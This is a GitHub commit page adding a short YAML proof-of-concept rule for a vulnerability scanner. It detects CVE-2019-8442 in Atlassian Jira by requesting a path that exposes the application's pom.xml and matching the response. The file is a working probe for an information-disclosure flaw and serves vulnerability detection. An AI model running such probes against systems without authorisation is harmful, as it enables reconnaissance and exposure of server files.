Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
Pa55w0rd authored Jan 7, 2021
1 parent 6242770 commit 5bc3871
Showing 1 changed file with 11 additions and 0 deletions.
11 changes: 11 additions & 0 deletions pocs/jira-cve-2019-8442.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
name: poc-yaml-jira-cve-2019-8442
rules:
- method: GET
path: "/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
expression: |
response.status == 200 && response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>"))) && response.content_type.contains("application/xml")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
Affected Version: "<7.13.4, 8.00-8.0.4, 8.1.0-8.1.1"
links:
- https://nvd.nist.gov/vuln/detail/CVE-2019-8442

0 comments on commit 5bc3871

Please sign in to comment.